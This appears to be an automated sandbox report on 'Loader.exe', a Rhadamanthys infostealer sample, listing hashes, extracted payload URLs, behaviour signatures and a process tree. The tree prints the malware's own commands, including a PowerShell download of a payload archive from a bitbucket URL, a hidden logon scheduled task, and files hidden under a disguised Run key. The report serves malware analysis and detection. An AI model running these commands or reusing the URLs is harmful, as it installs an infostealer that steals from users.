Analysis
- max time kernel: 21s
- max time network: 32s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 12-06-2024 06:36

Static task: static1
Behavioral task: behavioral1
- Sample: Loader.exe
- Resource: win10-20240404-en
General
- Target: Loader.exe
- Size: 7KB
- MD5: b5e479d3926b22b59926050c29c4e761
- SHA1: a456cc6993d12abe6c44f2d453d7ae5da2029e24
- SHA256: fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
- SHA512: 09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
- SSDEEP: 192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
- Extracted: https://rentry.org/lem61111111111/raw
- Extracted: https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    description            pid   process            target process
    PID 1680 created 3016  1680  ljmfrqdk.g5r2.exe  sihost.exe
- Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   process
    2     4848  powershell.exe
    4     4848  powershell.exe
    11    824   powershell.exe
    13    4268  powershell.exe
- Command and Scripting Interpreter: PowerShell
  Processes:
    pid   process
    4848  powershell.exe
    4268  powershell.exe
    824   powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (5 IoCs)
  Processes:
    pid   process
    5000  ljmfrqdk.g5r0.exe
    4908  ljmfrqdk.g5r1.exe
    1680  ljmfrqdk.g5r2.exe
    4164  ljmfrqdk.g5r3.exe
    2052  ljmfrqdk.g5r4.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    description: Set value (str)
    ioc: \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"
    process: ljmfrqdk.g5r4.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow  ioc
    7     api.ipify.org
    8     api.ipify.org
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  Processes:
    pid   process
    4848  powershell.exe
    4848  powershell.exe
    4848  powershell.exe
    824   powershell.exe
    824   powershell.exe
    824   powershell.exe
    4268  powershell.exe
    4268  powershell.exe
    4268  powershell.exe
    1680  ljmfrqdk.g5r2.exe
    1680  ljmfrqdk.g5r2.exe
    4488  dialer.exe
    4488  dialer.exe
    4488  dialer.exe
    4488  dialer.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
    description                          pid   process
    Token: SeDebugPrivilege              4848  powershell.exe
    Token: SeIncreaseQuotaPrivilege      4848  powershell.exe
    Token: SeSecurityPrivilege           4848  powershell.exe
    Token: SeTakeOwnershipPrivilege      4848  powershell.exe
    Token: SeLoadDriverPrivilege         4848  powershell.exe
    Token: SeSystemProfilePrivilege      4848  powershell.exe
    Token: SeSystemtimePrivilege         4848  powershell.exe
    Token: SeProfSingleProcessPrivilege  4848  powershell.exe
    Token: SeIncBasePriorityPrivilege    4848  powershell.exe
    Token: SeCreatePagefilePrivilege     4848  powershell.exe
    Token: SeBackupPrivilege             4848  powershell.exe
    Token: SeRestorePrivilege            4848  powershell.exe
    Token: SeShutdownPrivilege           4848  powershell.exe
    Token: SeDebugPrivilege              4848  powershell.exe
    Token: SeSystemEnvironmentPrivilege  4848  powershell.exe
    Token: SeRemoteShutdownPrivilege     4848  powershell.exe
    Token: SeUndockPrivilege             4848  powershell.exe
    Token: SeManageVolumePrivilege       4848  powershell.exe
    Token: 33                            4848  powershell.exe
    Token: 34                            4848  powershell.exe
    Token: 35                            4848  powershell.exe
    Token: 36                            4848  powershell.exe
    Token: SeDebugPrivilege              2052  ljmfrqdk.g5r4.exe
    Token: SeIncreaseQuotaPrivilege      4504  wmic.exe
    Token: SeSecurityPrivilege           4504  wmic.exe
    Token: SeTakeOwnershipPrivilege      4504  wmic.exe
    Token: SeLoadDriverPrivilege         4504  wmic.exe
    Token: SeSystemProfilePrivilege      4504  wmic.exe
    Token: SeSystemtimePrivilege         4504  wmic.exe
    Token: SeProfSingleProcessPrivilege  4504  wmic.exe
    Token: SeIncBasePriorityPrivilege    4504  wmic.exe
    Token: SeCreatePagefilePrivilege     4504  wmic.exe
    Token: SeBackupPrivilege             4504  wmic.exe
    Token: SeRestorePrivilege            4504  wmic.exe
    Token: SeShutdownPrivilege           4504  wmic.exe
    Token: SeDebugPrivilege              4504  wmic.exe
    Token: SeSystemEnvironmentPrivilege  4504  wmic.exe
    Token: SeRemoteShutdownPrivilege     4504  wmic.exe
    Token: SeUndockPrivilege             4504  wmic.exe
    Token: SeManageVolumePrivilege       4504  wmic.exe
    Token: 33                            4504  wmic.exe
    Token: 34                            4504  wmic.exe
    Token: 35                            4504  wmic.exe
    Token: 36                            4504  wmic.exe
    Token: SeDebugPrivilege              824   powershell.exe
    Token: SeIncreaseQuotaPrivilege      4504  wmic.exe
    Token: SeSecurityPrivilege           4504  wmic.exe
    Token: SeTakeOwnershipPrivilege      4504  wmic.exe
    Token: SeLoadDriverPrivilege         4504  wmic.exe
    Token: SeSystemProfilePrivilege      4504  wmic.exe
    Token: SeSystemtimePrivilege         4504  wmic.exe
    Token: SeProfSingleProcessPrivilege  4504  wmic.exe
    Token: SeIncBasePriorityPrivilege    4504  wmic.exe
    Token: SeCreatePagefilePrivilege     4504  wmic.exe
    Token: SeBackupPrivilege             4504  wmic.exe
    Token: SeRestorePrivilege            4504  wmic.exe
    Token: SeShutdownPrivilege           4504  wmic.exe
    Token: SeDebugPrivilege              4504  wmic.exe
    Token: SeSystemEnvironmentPrivilege  4504  wmic.exe
    Token: SeRemoteShutdownPrivilege     4504  wmic.exe
    Token: SeUndockPrivilege             4504  wmic.exe
    Token: SeManageVolumePrivilege       4504  wmic.exe
    Token: 33                            4504  wmic.exe
    Token: 34                            4504  wmic.exe
- Suspicious use of WriteProcessMemory (56 IoCs)
  Processes:
    description                       pid   process            target process
    PID 1448 wrote to memory of 4848  1448  Loader.exe         powershell.exe
    PID 1448 wrote to memory of 4848  1448  Loader.exe         powershell.exe
    PID 4848 wrote to memory of 5000  4848  powershell.exe     ljmfrqdk.g5r0.exe
    PID 4848 wrote to memory of 5000  4848  powershell.exe     ljmfrqdk.g5r0.exe
    PID 4848 wrote to memory of 5000  4848  powershell.exe     ljmfrqdk.g5r0.exe
    PID 4848 wrote to memory of 4908  4848  powershell.exe     ljmfrqdk.g5r1.exe
    PID 4848 wrote to memory of 4908  4848  powershell.exe     ljmfrqdk.g5r1.exe
    PID 4848 wrote to memory of 4908  4848  powershell.exe     ljmfrqdk.g5r1.exe
    PID 4848 wrote to memory of 1680  4848  powershell.exe     ljmfrqdk.g5r2.exe
    PID 4848 wrote to memory of 1680  4848  powershell.exe     ljmfrqdk.g5r2.exe
    PID 4848 wrote to memory of 1680  4848  powershell.exe     ljmfrqdk.g5r2.exe
    PID 4848 wrote to memory of 4164  4848  powershell.exe     ljmfrqdk.g5r3.exe
    PID 4848 wrote to memory of 4164  4848  powershell.exe     ljmfrqdk.g5r3.exe
    PID 4848 wrote to memory of 2052  4848  powershell.exe     ljmfrqdk.g5r4.exe
    PID 4848 wrote to memory of 2052  4848  powershell.exe     ljmfrqdk.g5r4.exe
    PID 5000 wrote to memory of 4540  5000  ljmfrqdk.g5r0.exe  cmd.exe
    PID 4908 wrote to memory of 596   4908  ljmfrqdk.g5r1.exe  cmd.exe
    PID 5000 wrote to memory of 4540  5000  ljmfrqdk.g5r0.exe  cmd.exe
    PID 4908 wrote to memory of 596   4908  ljmfrqdk.g5r1.exe  cmd.exe
    PID 4540 wrote to memory of 5060  4540  cmd.exe            chcp.com
    PID 4540 wrote to memory of 5060  4540  cmd.exe            chcp.com
    PID 2052 wrote to memory of 2060  2052  ljmfrqdk.g5r4.exe  attrib.exe
    PID 2052 wrote to memory of 2060  2052  ljmfrqdk.g5r4.exe  attrib.exe
    PID 596 wrote to memory of 4548   596   cmd.exe            where.exe
    PID 596 wrote to memory of 4548   596   cmd.exe            where.exe
    PID 4540 wrote to memory of 992   4540  cmd.exe            findstr.exe
    PID 4540 wrote to memory of 992   4540  cmd.exe            findstr.exe
    PID 2052 wrote to memory of 1292  2052  ljmfrqdk.g5r4.exe  attrib.exe
    PID 2052 wrote to memory of 1292  2052  ljmfrqdk.g5r4.exe  attrib.exe
    PID 2052 wrote to memory of 4504  2052  ljmfrqdk.g5r4.exe  wmic.exe
    PID 2052 wrote to memory of 4504  2052  ljmfrqdk.g5r4.exe  wmic.exe
    PID 4540 wrote to memory of 1104  4540  cmd.exe            findstr.exe
    PID 4540 wrote to memory of 1104  4540  cmd.exe            findstr.exe
    PID 596 wrote to memory of 824    596   cmd.exe            powershell.exe
    PID 596 wrote to memory of 824    596   cmd.exe            powershell.exe
    PID 4540 wrote to memory of 2612  4540  cmd.exe            findstr.exe
    PID 4540 wrote to memory of 2612  4540  cmd.exe            findstr.exe
    PID 4540 wrote to memory of 1884  4540  cmd.exe            schtasks.exe
    PID 4540 wrote to memory of 1884  4540  cmd.exe            schtasks.exe
    PID 4540 wrote to memory of 3652  4540  cmd.exe            schtasks.exe
    PID 4540 wrote to memory of 3652  4540  cmd.exe            schtasks.exe
    PID 4540 wrote to memory of 5100  4540  cmd.exe            cmd.exe
    PID 4540 wrote to memory of 5100  4540  cmd.exe            cmd.exe
    PID 5100 wrote to memory of 2040  5100  cmd.exe            reg.exe
    PID 5100 wrote to memory of 2040  5100  cmd.exe            reg.exe
    PID 4540 wrote to memory of 4208  4540  cmd.exe            cmd.exe
    PID 4540 wrote to memory of 4208  4540  cmd.exe            cmd.exe
    PID 4208 wrote to memory of 68    4208  cmd.exe            reg.exe
    PID 4208 wrote to memory of 68    4208  cmd.exe            reg.exe
    PID 4540 wrote to memory of 4268  4540  cmd.exe            powershell.exe
    PID 4540 wrote to memory of 4268  4540  cmd.exe            powershell.exe
    PID 1680 wrote to memory of 4488  1680  ljmfrqdk.g5r2.exe  dialer.exe
    PID 1680 wrote to memory of 4488  1680  ljmfrqdk.g5r2.exe  dialer.exe
    PID 1680 wrote to memory of 4488  1680  ljmfrqdk.g5r2.exe  dialer.exe
    PID 1680 wrote to memory of 4488  1680  ljmfrqdk.g5r2.exe  dialer.exe
    PID 1680 wrote to memory of 4488  1680  ljmfrqdk.g5r2.exe  dialer.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Views/modifies file attributes (1 TTP, 2 IoCs)
  Processes:
    pid   process
    2060  attrib.exe
    1292  attrib.exe
Processes
c:\windows\system32\sihost.exe
  Command line: sihost.exe
  C:\Windows\SysWOW64\dialer.exe
    Command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
C:\Users\Admin\AppData\Local\Temp\Loader.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\chcp.com
          Command line: chcp 1251
        C:\Windows\system32\findstr.exe
          Command line: findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        C:\Windows\system32\findstr.exe
          Command line: findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
        C:\Windows\system32\findstr.exe
          Command line: findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        C:\Windows\system32\schtasks.exe
          Command line: schtasks /query /tn "MyBatchScript"
        C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
          - Creates scheduled task(s)
        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\reg.exe
            Command line: reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\reg.exe
            Command line: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\where.exe
          Command line: where node
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\attrib.exe
        Command line: attrib +h +s C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
        - Views/modifies file attributes
      C:\Windows\system32\attrib.exe
        Command line: attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        - Views/modifies file attributes
      C:\Windows\System32\Wbem\wmic.exe
        Command line: wmic csproduct get UUID
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 91897de07fcb115c5f42cf4c7a984982
  SHA1: 4903ea814fed6c31b62b394cc9eb024d107b1834
  SHA256: bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789
  SHA512: 54fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 45d62890ffc360398bca85751bac0ade
  SHA1: 68f3f439c4a1f5cb02073d4af55c6854bd775e95
  SHA256: 66cff04910713a4690f24354994e974bb08fc5a0379b8c4eb48d134bb5a84e74
  SHA512: 3d07a452094aa55035e3d6d0970d0cb332f6d3f1c0c2c8667c71b98f9b280dae17709b7340ac5a47c76b44e86b7a21181d410f5c922a4aaf73717c6d45a07e29
- C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat
  Filesize: 1KB
  MD5: c767a4ce4fc8d490fb2af1daa95a84c6
  SHA1: a198c337f2f3eac7ea75ed82f6a765e2f8bcda92
  SHA256: c2fdf52cc1547c64a984e5e04b13d2fbd4a8e7b4c8f7d738f1c8618c9fe0613c
  SHA512: cbcc782ea2af0594ed15cfcf243d22da61d27b63ec7e6dc6f394c891efd398fc64690dbeb944213c7f8f8d6589e75adc8f55c87aec8515422d51ccc5a479851f
- C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat
  Filesize: 6KB
  MD5: b5d0441990b0eb32503744dc54199f44
  SHA1: ff62e8b4ffb31d7d441fa65f8603946a2c0fea7a
  SHA256: 05bea0edc97f37ea1fb3d4ed27b1c8a372918338e98855f45cdd414d7777fc1c
  SHA512: a698b650a94eba4a99336c2afa472ccc89bc22c50ee486f8cdffd96c77935bae2180166eac99e6aa5ca86a1c784259ad13311a5404a2df889d392f34139fcff5
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ys433f.oz1.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe
  Filesize: 94KB
  MD5: 6460dff2e792fd74bfc7db3d8c747a58
  SHA1: 5a395e8f069c17b3f9cfd6a663ca60512b628142
  SHA256: 1656c23a4f17b821d523293ff4ba84b2c66a11db761782a774dd47b4c8c7667f
  SHA512: 808ba395708c5d0a4ebe4ca8d1a4f2011abae61c0d2a36f84af7d097ddba7262c220def4fbfc86881db52b0189f008c5f7de39574f26b3bdfb2e5b10c29eb1a9
- C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe
  Filesize: 88KB
  MD5: c4b307c1aeca9d40de4b8ef5a7299c85
  SHA1: ea7e1d5a5ef83a0f2ce119a56b441493dd1dd5bd
  SHA256: 56374adc264aa171a8804dbc071ec959f71d54aeefd824d16e2a2e7a427cecac
  SHA512: 2fce556f6ac9d005dd62907e5c852a91a0b7f777f68a1946a3ceb27440a4457de3952e25dd2e35e62474fe8ab0df1cb10a2a92b699fec776364bec54d4565bfb
- C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe
  Filesize: 355KB
  MD5: c93d65bc0ed7ee88d266b4be759301f8
  SHA1: 8c0c415ba824737c61904676e7132094f5710099
  SHA256: f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
  SHA512: 7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
- C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe
  Filesize: 5.2MB
  MD5: f55fc8c32bee8f7b2253298f0a0012ba
  SHA1: 574c7a8f3eb378c03f58bc96252769296b20970e
  SHA256: cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
  SHA512: c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
- C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
  Filesize: 9.5MB
  MD5: b8c70bbe49951cb98becf2fc0bce3b7b
  SHA1: 9c22bea97baabb2b9a216a9cd2fce6b090338b06
  SHA256: 2835b997c97408baa0da7326c63278207bcb5637f6ecb2ba70b3036092e96bc6
  SHA512: 6b305a8a12f2ddc43af26869c9660007a190bae263f52efc7c7c398aa0756bb49087ab308270634171cc85d12506b310c28b1b63bcd7bc7f6477931f9a6edfb4
- memory/1448-1-0x0000000000740000-0x0000000000748000-memory.dmp
  Filesize: 32KB
- memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
  Filesize: 4KB
- memory/1680-162-0x00000000772F0000-0x00000000774B2000-memory.dmp
  Filesize: 1.8MB
- memory/1680-164-0x0000000001260000-0x00000000012CD000-memory.dmp
  Filesize: 436KB
- memory/1680-91-0x0000000001260000-0x00000000012CD000-memory.dmp
  Filesize: 436KB
- memory/1680-160-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp
  Filesize: 1.9MB
- memory/1680-159-0x0000000000E40000-0x0000000001240000-memory.dmp
  Filesize: 4.0MB
- memory/1680-158-0x0000000000E40000-0x0000000001240000-memory.dmp
  Filesize: 4.0MB
- memory/4488-163-0x00000000009D0000-0x00000000009D9000-memory.dmp
  Filesize: 36KB
- memory/4488-166-0x0000000004A20000-0x0000000004E20000-memory.dmp
  Filesize: 4.0MB
- memory/4488-167-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp
  Filesize: 1.9MB
- memory/4488-169-0x00000000772F0000-0x00000000774B2000-memory.dmp
  Filesize: 1.8MB
- memory/4848-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB
- memory/4848-7-0x000002C226F00000-0x000002C226F22000-memory.dmp
  Filesize: 136KB
- memory/4848-11-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB
- memory/4848-12-0x000002C23F220000-0x000002C23F296000-memory.dmp
  Filesize: 472KB
- memory/4848-108-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB
- memory/4848-26-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB
- memory/4848-13-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB
- memory/4848-49-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
  Filesize: 9.9MB